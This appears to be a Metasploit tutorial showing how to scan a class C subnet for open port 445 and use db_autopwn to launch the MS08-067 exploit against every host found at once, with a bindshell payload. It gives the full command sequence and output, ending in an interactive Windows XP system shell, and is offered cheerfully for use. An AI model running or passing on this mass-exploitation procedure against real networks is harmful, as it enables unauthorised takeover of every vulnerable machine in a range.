One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time.

In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.

To get started,  run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.

msf > load db_sqlite3 
[*] Successfully loaded plugin: db_sqlite3

Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:

msf > db_create 
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db

To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:

msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24

Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:

msf > db_autopwn -e -p -b -m ms08_067

Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.

msf > sessions -l
Active sessions
===============

Id Description Tunnel                                  
-- ----------- ------                                  
1   Command shell  AAA.BBB.CCC.11 -> AAA.BBB.CCC.86

msf > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Enjoy!